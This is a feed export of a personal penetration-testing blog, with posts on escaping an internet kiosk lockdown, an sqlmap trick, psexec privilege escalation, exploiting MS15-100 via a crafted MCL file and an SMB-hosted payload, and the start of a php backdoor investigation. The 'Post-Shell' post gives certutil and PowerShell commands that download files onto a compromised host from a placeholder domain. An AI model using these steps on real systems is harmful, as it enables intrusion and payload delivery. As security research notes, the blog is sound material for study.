tag:blogger.com,1999:blog-48658191536303846612024-03-06T09:11:55.438+08:00Butter + Margarine != CheeseMilk serve in different mannerUnknownnoreply@blogger.comBlogger194125tag:blogger.com,1999:blog-4865819153630384661.post-75420423754948533452020-02-22T18:33:00.001+08:002020-02-22T18:33:23.766+08:00Breaking the Internet Kiosk<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;">Objective</span></h2>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;">Recently for one our Redteam objective, our client request if we can actually break or escape from their Kiosk Solution Environment. Kiosk Lockdown is commonly used in Virtual Internet Banking Station, Airports and various customer services center lot.</span></div>
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<h2>
<span style="font-family: "verdana" , sans-serif;">Kiosk Lockdown Solutions.</span></h2>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">A typical Kiosk Lockdown usually are wrapped around a container like the following pseudo layout.</span></div>
<blockquote class="tr_bq">
<br />
<br />
<pre>Svchost.exe --> Lockdown Solutions --> Whitelisted App (in most cases Browsers) </pre>
</blockquote>
<blockquote class="tr_bq">
<span style="font-family: "verdana" , sans-serif;"> </span></blockquote>
<div style="text-align: left;">
<h2>
<span style="font-family: "verdana" , sans-serif;">Case Studies - Lockdown Protections</span></h2>
<span style="font-family: "verdana" , sans-serif;"></span><br />
<div>
<span style="font-family: "verdana" , sans-serif;">In my case we are only given a keyboard and a mouse to navigate. Here is a screenshot of our lockdown kiosk.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">All Drives and Shortcuts are disabled, Start Button have been disabled.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvmR-B8BnIYIMzaCcV2j5WWczasT3Ne_q9ox1mME0PbfUciZnT2mkMQ2unLrA9hTxpz3YL8Y81005iszRvyI4Wv7QsHJ7rWjWd_eC301YJaQmRpXqGaiAuIVPi1NDXh5tYltisrudHwCb-/s1600/lockdown1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="828" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvmR-B8BnIYIMzaCcV2j5WWczasT3Ne_q9ox1mME0PbfUciZnT2mkMQ2unLrA9hTxpz3YL8Y81005iszRvyI4Wv7QsHJ7rWjWd_eC301YJaQmRpXqGaiAuIVPi1NDXh5tYltisrudHwCb-/s320/lockdown1.png" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Message from CTRL + ALT + DEL have bee suppressed.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSZQlrItZUrWlj5-axtbI0LTSLPFTxWFZrNryYiRM8ZJOePrERBJtS-B2p2_E-BugRskLbDhswE9AzcXddGk5mk7YwwB2ikn4ipDHsc4GRi40SLSj96aoAzTPqXJpDcAa4049JSWhBK8XC/s1600/lockdown2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="409" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSZQlrItZUrWlj5-axtbI0LTSLPFTxWFZrNryYiRM8ZJOePrERBJtS-B2p2_E-BugRskLbDhswE9AzcXddGk5mk7YwwB2ikn4ipDHsc4GRi40SLSj96aoAzTPqXJpDcAa4049JSWhBK8XC/s320/lockdown2.png" width="279" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "verdana" , sans-serif;">Using the UNC path trick didnt work.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4sLjmC7n1NZ-I7iJiwhoVhhk-H2L5Ps6G_7kdWAZ1qlS-ubLmKxEJa2-b3EFHxAs39oKsMofdsu_L3OGbTqRdtfaHa2o3uJ2k33f-DQu-GNmiFfJwGg4so1vfwIzZrrowsUO2yrQvaS9Y/s1600/lockdown3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="236" data-original-width="688" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4sLjmC7n1NZ-I7iJiwhoVhhk-H2L5Ps6G_7kdWAZ1qlS-ubLmKxEJa2-b3EFHxAs39oKsMofdsu_L3OGbTqRdtfaHa2o3uJ2k33f-DQu-GNmiFfJwGg4so1vfwIzZrrowsUO2yrQvaS9Y/s320/lockdown3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: "verdana" , sans-serif;">Using the File - Print - PDF trick also didn't work this time.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8UTBs4QPKEuWGmkdaCDfypJmW-nUG2wZUsAjpROrtuSvV9ZTmKxX91V2BOhhYPgzKV3DvDGqK7VWPG4OBKOmcVy_BF8lDJmxd8GQuD3L9rLz1ODvMAxH6Gmqxkm03gJj_SYo2QEp0djZ/s1600/lockdown4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="620" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8UTBs4QPKEuWGmkdaCDfypJmW-nUG2wZUsAjpROrtuSvV9ZTmKxX91V2BOhhYPgzKV3DvDGqK7VWPG4OBKOmcVy_BF8lDJmxd8GQuD3L9rLz1ODvMAxH6Gmqxkm03gJj_SYo2QEp0djZ/s320/lockdown4.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<span style="font-family: "verdana" , sans-serif;"></span>
<h2>
<span style="font-family: "verdana" , sans-serif;">Escaping the Kiosk- Poor man No Kobalt-Strike style.</span></h2>
<div>
<span style="font-family: "verdana" , sans-serif;">While the environment certainly looks quite secure in 2020. They are still few loopholes we can leverage on.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">What if we host a legit cmd.exe binary and hosted on the Internet and download it can we execute it?</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaXbHgWj1KcO5bsDeVwQfRc0MPrgmj81dLREhI6HJOzaj8u4GNk7N6sfjgdQwhfIHN80Igaz6C3HUFkCYjtB_N8dG9wHStCmjFMvGlU9UzTIWvKpAvi6jno7PJ1vEEzf3YtXX99Xpw3IKN/s1600/lockdown5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="801" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaXbHgWj1KcO5bsDeVwQfRc0MPrgmj81dLREhI6HJOzaj8u4GNk7N6sfjgdQwhfIHN80Igaz6C3HUFkCYjtB_N8dG9wHStCmjFMvGlU9UzTIWvKpAvi6jno7PJ1vEEzf3YtXX99Xpw3IKN/s320/lockdown5.PNG" width="320" /></a></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Clicking on RUN works well as cmd is a legit signed binary and was considered non-malicious by Defender by default. However we will encounter this error which prevent us from using cmd.exe :(</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUYTwgWPvkyFkhY-Dt5kWmCbxzr_G6StwcgfhuCpePpX7n2kLzCwpSRw5f6dpVrZYGS1jyrlAW9ybzgiA7KOB5HLK6ySn0fdetOoyrabjCyx3jN4NpDaHWeh8WbeYWIn_mfpDlltZeTZG/s1600/lockdown6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="887" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUYTwgWPvkyFkhY-Dt5kWmCbxzr_G6StwcgfhuCpePpX7n2kLzCwpSRw5f6dpVrZYGS1jyrlAW9ybzgiA7KOB5HLK6ySn0fdetOoyrabjCyx3jN4NpDaHWeh8WbeYWIn_mfpDlltZeTZG/s320/lockdown6.PNG" width="320" /></a></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Thanks to Atuk <a href="https://blog.didierstevens.com/" target="_blank">Didier Steven</a>, we can leverage on cmd.exe created by the <a href="https://reactos.org/" target="_blank">ReactOS Project.</a> (A free and opensource windows implementation binary).</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl54FKLdPg5_QR6rzjMCrdlYwLcNaFwvUSsQeAYJ9qcOLLlhzAma5G5o2q9DP-58Ab9V9Lwm3Ndi_ZYz1afcSYYt53w5A31378AeHpG6B7ekUwmx8PrTkeGQc6SNF6GLPLvwz3gZlW6AAv/s1600/lockdown7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="801" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl54FKLdPg5_QR6rzjMCrdlYwLcNaFwvUSsQeAYJ9qcOLLlhzAma5G5o2q9DP-58Ab9V9Lwm3Ndi_ZYz1afcSYYt53w5A31378AeHpG6B7ekUwmx8PrTkeGQc6SNF6GLPLvwz3gZlW6AAv/s320/lockdown7.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">It works.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHsmxCWkpFabOf8mcwH5e2XUqLWGgYUDoGBgIuqMnSMTiAzLhN3eP1E1h97gJyO_u2mMTRvveevg_GcXY2WVQ3Roi1hZFFNUeUcQ46x8u8X0NSqWl0DDujvybyGvq8oLTp9G6S_z4cxWdK/s1600/lockdown8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="648" data-original-width="891" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHsmxCWkpFabOf8mcwH5e2XUqLWGgYUDoGBgIuqMnSMTiAzLhN3eP1E1h97gJyO_u2mMTRvveevg_GcXY2WVQ3Roi1hZFFNUeUcQ46x8u8X0NSqWl0DDujvybyGvq8oLTp9G6S_z4cxWdK/s320/lockdown8.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: verdana, sans-serif;">In order to stay under the radar .. We can fetch "legit" tools from sysinternal </span><br />
live.sysinternals.com via net use<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoSIJPSE8TnjCEzwdXtEE3KM0avDMWLSx2R2L_xmhz7kePUHYYqRta0_W4ejigNQvqpNRFrZxMDXTgEbcpL5EQMIzLlEKc0i17nA1_4HR8qkWkiY3eFk-0lkHcBT2AOH3GTxa7QScyxJ4/s1600/lockdown9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="817" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoSIJPSE8TnjCEzwdXtEE3KM0avDMWLSx2R2L_xmhz7kePUHYYqRta0_W4ejigNQvqpNRFrZxMDXTgEbcpL5EQMIzLlEKc0i17nA1_4HR8qkWkiY3eFk-0lkHcBT2AOH3GTxa7QScyxJ4/s320/lockdown9.PNG" width="320" /></a></div>
<br /></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<span style="font-family: verdana, sans-serif;">Run procexp . from now we have a clear visibility on how to escape :)</span><br />
<span style="font-family: verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqR4dKJ6mnXf4ZKPY2RMFXsBAWyj0Xf5pQLwtOrQ5n69N63k8aD6azX9pnU9S7Dwjsw2U6T3cJLSgQJXesgbtTToo11k5oHM-6208JKDcqxXSXE1-jpsRvbjO3gSXFw8o7RtqIEbG6BoxR/s1600/lockdown10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="577" data-original-width="836" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqR4dKJ6mnXf4ZKPY2RMFXsBAWyj0Xf5pQLwtOrQ5n69N63k8aD6azX9pnU9S7Dwjsw2U6T3cJLSgQJXesgbtTToo11k5oHM-6208JKDcqxXSXE1-jpsRvbjO3gSXFw8o7RtqIEbG6BoxR/s320/lockdown10.PNG" width="320" /></a></div>
<span style="font-family: verdana, sans-serif;"><br /></span>
<span style="font-family: verdana, sans-serif;"><br /></span>
<span style="font-family: verdana, sans-serif;"><br /></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-44315176418558806482017-12-09T22:24:00.000+08:002017-12-09T22:24:52.742+08:00Fast re-query trick in SQLMAP<div dir="ltr" style="text-align: left;" trbidi="on">
Sometimes you want to perform requery (or running the same query multiple time ) in sqlmap especially when you drop in to sql-shell mode. By default if you are running the same query, it will not execute the query from the injection but from cached/logs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLKc021jbrgnwxGhu47gSWKE_7ndtSTLAtCkjjzaVTlyRDdECeeBSKAfxC3oJ4JTj471MYoQLl7lat7l76xk9rZnEtXhH-1Z2c_TW-33577b9cueDUM1IeM4ploBLkORBTZ8rbO3vAwQyf/s1600/mik.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="65" data-original-width="769" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLKc021jbrgnwxGhu47gSWKE_7ndtSTLAtCkjjzaVTlyRDdECeeBSKAfxC3oJ4JTj471MYoQLl7lat7l76xk9rZnEtXhH-1Z2c_TW-33577b9cueDUM1IeM4ploBLkORBTZ8rbO3vAwQyf/s320/mik.PNG" width="320" /></a></div>
<span id="goog_1747464621"></span><span id="goog_1747464622"></span><br />
<br />
In order to perform the re-query without exiting sql-shell , one can just append the query with random comment such as /**/ or --ff-- (depend on your injection case)..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAqdECa89mkqsrfCLNm-1TIQpPV7DEUVOfBcMMp4_OpOxHVUi-0NcrTWRGbulyX3wnjtLGU644z7W3NRr79DyZ0sA3WDnAbsx5m814cuY3sWRsZVDcKHHJTYqGy61qSbbCXyD2EZDS_3Fb/s1600/mik2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="809" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAqdECa89mkqsrfCLNm-1TIQpPV7DEUVOfBcMMp4_OpOxHVUi-0NcrTWRGbulyX3wnjtLGU644z7W3NRr79DyZ0sA3WDnAbsx5m814cuY3sWRsZVDcKHHJTYqGy61qSbbCXyD2EZDS_3Fb/s320/mik2.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-36989368874197678792017-10-05T06:20:00.000+08:002017-10-05T06:20:09.992+08:00Windows Post-Shell command. Files Delivery<div dir="ltr" style="text-align: left;" trbidi="on">
If you ever obtain a Windows shell remotely. These are few tricks I currently use to summon external files. For my notes.<br />
<br />
1. Wgetvbs<br />
<br />
https://gist.github.com/sckalath/ec7af6a1786e3de6c309<br />
<br />
2. Certutil<br />
<br />
<span style="background-color: white; color: #99a1a9; font-family: inherit; font-size: 16px;"> </span><span style="background-color: white; color: #99a1a9; font-family: "courier new" , "courier" , monospace; font-size: 16px;"><span style="color: #14171a; letter-spacing: 0.27px; white-space: pre-wrap;">certutil.exe -urlcache -split -f http://wateverdomainip.com/files.blah</span></span><br />
<span style="background-color: white; color: #99a1a9; font-family: "courier new" , "courier" , monospace; font-size: 16px;"><span style="color: #14171a; letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>
<span style="background-color: white; color: #99a1a9; font-family: "courier new" , "courier" , monospace; font-size: 16px;"><span style="color: #14171a; letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>3. Powershell<br />
<span style="color: #14171a; font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>
<br />
<span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;">PowerShell (New-Object System.Net.WebClient).DownloadFile</span></span><br />
<span style="letter-spacing: 0.27px; white-space: pre-wrap;"><span style="background-color: white; color: #14171a; font-family: courier new, courier, monospace;"></span></span><br />
<span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;">('http://</span></span><span style="background-color: white; color: #14171a; font-family: "courier new", courier, monospace; font-size: 16px; letter-spacing: 0.27px; white-space: pre-wrap;">wateverdomainip.com/files.blah</span><span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;">','files.blah')</span></span><br />
<span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>
Use https if nesscary.<br />
<br />
P/S: Metasploit is awesome but many people are not happy with it. :P<br />
<br />
<br />
<br />
<br />
<span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>
<span style="color: #14171a; font-family: courier new, courier, monospace;"><span style="letter-spacing: 0.27px; white-space: pre-wrap;"><br /></span></span>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-88318390927853431012015-12-23T15:41:00.001+08:002015-12-23T15:41:22.401+08:00From ADMIN to SYSTEM with love. The case of Windows 10, Server 2016 and above<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
This is for my mental note. If it benefits you great.</div>
2015 is an extremely challenging year for most of us. Nerveless hitting a shell with admin privileged is not really a big deal. Problem is that on certain environment, the system have been hardened to prevent lsass.exe process making dumping or tampering seems impossible. <div>
<br /></div>
<div>
For those of you who are not familiar, onprevious version of Windows we can simply use the <a href="http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html" target="_blank">at.exe trick combine with remote.exe</a> (refer to Chris Gates note) to obtained SYSTEM (aka NT AUTHORITY\SYSTEM). </div>
<div>
<br /></div>
<div>
Unfortunately on Windows 10. The at function is no longer available.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYROKOaToWD0eaHSxgz-3m_-fsk-X6OfjaOFJLisevonEeZSeFFAB4l7VGIA4tFc32-K9JDibHm1-bpYuMUOCl3oep3q76DEtd-nrgMlyQ7iJLboddGoaQ1NJ1DuL1V9qXo_Xsj5hU5tmn/s1600/at.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYROKOaToWD0eaHSxgz-3m_-fsk-X6OfjaOFJLisevonEeZSeFFAB4l7VGIA4tFc32-K9JDibHm1-bpYuMUOCl3oep3q76DEtd-nrgMlyQ7iJLboddGoaQ1NJ1DuL1V9qXo_Xsj5hU5tmn/s1600/at.PNG" /></a></div>
<div>
<br /><div>
<br /></div>
<div>
This prove to be inconvenience for us. On Alternative method, we can use the meterpeter getsystem command which based on 3 techniques:</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UQWO08_aEcJE5GkYcskA-l4oQL6Ek2UmOYaldRILULg5gT0BS_gnBquRBxHCntsq_FC-jI5L9Ah7fBDfhIXLFepsjLA8C7PNxlFEAB-RCJxjjA53ZxADUEVNNRYvqu-m5rlsEbXhFXwR/s1600/at2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UQWO08_aEcJE5GkYcskA-l4oQL6Ek2UmOYaldRILULg5gT0BS_gnBquRBxHCntsq_FC-jI5L9Ah7fBDfhIXLFepsjLA8C7PNxlFEAB-RCJxjjA53ZxADUEVNNRYvqu-m5rlsEbXhFXwR/s400/at2.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
You can read on my <a href="http://y0nd13.blogspot.my/2015/03/bypassing-av-in-2015.html" target="_blank">AV evasion technique</a>. But say you are in a bit of hurry. and spawning shell via exploits is not priority and what you really truly need is just a Damn Good Shell to ehem let say install software? Simple just use <b>psexec. </b> I wrote it about it <a href="http://y0nd13.blogspot.my/2014/01/leveraging-psexec-to-execute-privileged.html" target="_blank">previously</a> to run as other user. But the current version psexec comes with a GodMode Switch.. that damn <b>-s switch.</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJsCt9HHiXyEiN7TsWiZvlx7kO1aAiCPLEYotBmG_-ZXOo-jK0Dyz1yx0KSwabv6ckviAELJyFfYrMe02fKdfAe0co28DkJfKsYrdc1unLb95ouh8IoiNUezY_Ii9JgFRL7TrBmAwtHUv/s1600/at3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJsCt9HHiXyEiN7TsWiZvlx7kO1aAiCPLEYotBmG_-ZXOo-jK0Dyz1yx0KSwabv6ckviAELJyFfYrMe02fKdfAe0co28DkJfKsYrdc1unLb95ouh8IoiNUezY_Ii9JgFRL7TrBmAwtHUv/s400/at3.png" width="400" /></a></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
To become a SYSTEM, right click run as admin for your cmd.exe. and run psexec -s -i -d CMD</div>
<div>
And thus you are spawn with a shell with the highest integrity.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgmoyy9n804nb_xBOWa8lRhb3bY1ceDJTqg6A60CvI-2M9lZ1YEG2xN1bJb-9IIPLQ2xpuWatECxmhnfGQ0kK2Sshm4SVA12XbT6sIkX_BLzIWdb61aodJ0HanGF7O1YM6FeJwAYK6lQUb/s1600/at4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgmoyy9n804nb_xBOWa8lRhb3bY1ceDJTqg6A60CvI-2M9lZ1YEG2xN1bJb-9IIPLQ2xpuWatECxmhnfGQ0kK2Sshm4SVA12XbT6sIkX_BLzIWdb61aodJ0HanGF7O1YM6FeJwAYK6lQUb/s640/at4.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
R.I.P AT and Shift 5 times.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-21288994379858529692015-09-11T11:46:00.002+08:002015-09-11T11:50:20.784+08:00Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution<div dir="ltr" style="text-align: left;" trbidi="on">
Trend Micro blog about <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/" target="_blank">it </a>few days ago. This vulnerability is related to Hacking Team leaked email addresses . The issue is so trival that exploitation is a piece of cake.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoHnd5nVaDeopzGxC9Z1hMYoRlHjdnyE-eFXi7EN9TGAkw1zTirCKUxt4o8_bWfzRgnz7l-EBjMdGpt9J0OR-hQA16DrWkzty2ItfzKP8iAIyTtKFGrp_8SKQ-imT4Hm6WtczYFoZauQEt/s1600/shit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoHnd5nVaDeopzGxC9Z1hMYoRlHjdnyE-eFXi7EN9TGAkw1zTirCKUxt4o8_bWfzRgnz7l-EBjMdGpt9J0OR-hQA16DrWkzty2ItfzKP8iAIyTtKFGrp_8SKQ-imT4Hm6WtczYFoZauQEt/s640/shit.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
Source: https://technet.microsoft.com/en-us/library/security/ms15-100</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Based on POC and description we just need to create a simple mcl file contains our executable path and preso it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRigy2Xkzv9c9veGZMoZ7LtY9bXj2xDI795gG6NS1fC9KJ_TSug9D7vehC-NNxWKb8nT4GCtJdZOHYUSEC_QlHV2yWlRPUN0ns-0F1PdTLTZhMaToh8N1zavNOcfbT4fQff3iTk1gLQ03i/s1600/shit2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRigy2Xkzv9c9veGZMoZ7LtY9bXj2xDI795gG6NS1fC9KJ_TSug9D7vehC-NNxWKb8nT4GCtJdZOHYUSEC_QlHV2yWlRPUN0ns-0F1PdTLTZhMaToh8N1zavNOcfbT4fQff3iTk1gLQ03i/s640/shit2.PNG" width="640" /></a></div>
<br />
The caveat for this attack is that you cannot passed an argument such as cmd.exe /c ipconfig in the mcl file. However we can execute our payload externally via UNC PATH provided by a simple SMB Server. The steps required.<br />
<br />
1. Generate evil payload exe<br />
2. Setup a SMB Listener<br />
3. Create MCL file that points to evil payload.<br />
4. Profits.<br />
<br />
I use <a href="http://www.coresecurity.com/corelabs-research/open-source-tools/impacket" target="_blank">Impacket SMB Server</a> to simulate the steps above. If you are a bit creative, we can use DLL Hijacking Method to cloak our payload .<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPsuEoLsCpNquxhZYFziY_DG-7jZZzKAhj2hYqQ45YzLv9504Q2jiYnMouHbHzkt7yL57L-zaS_O8lUs6OyH22FaExRB7GmdUx9o4bvWNx9VCEZPX08k7aEu6Xab_2fg3RCaGr2Tsrh3XL/s1600/shit3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPsuEoLsCpNquxhZYFziY_DG-7jZZzKAhj2hYqQ45YzLv9504Q2jiYnMouHbHzkt7yL57L-zaS_O8lUs6OyH22FaExRB7GmdUx9o4bvWNx9VCEZPX08k7aEu6Xab_2fg3RCaGr2Tsrh3XL/s640/shit3.PNG" width="640" /></a></div>
<br />
<br />
Better patch it up fast.<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-84195637342082110212015-05-02T09:36:00.002+08:002015-05-03T08:43:03.721+08:00The curious case of crc32 gzinflate php backdoor. <div dir="ltr" style="text-align: left;" trbidi="on">
I was working on a side project on an IRH for a certain site. If you got compromised that bad what you should do is ls -lt to find out list of recent files being tampered.<br />
<br />
I found out one glaring backdoor which is unlike most php backdoor that I've ever encountered.<br />
<br />
<br />
<br />
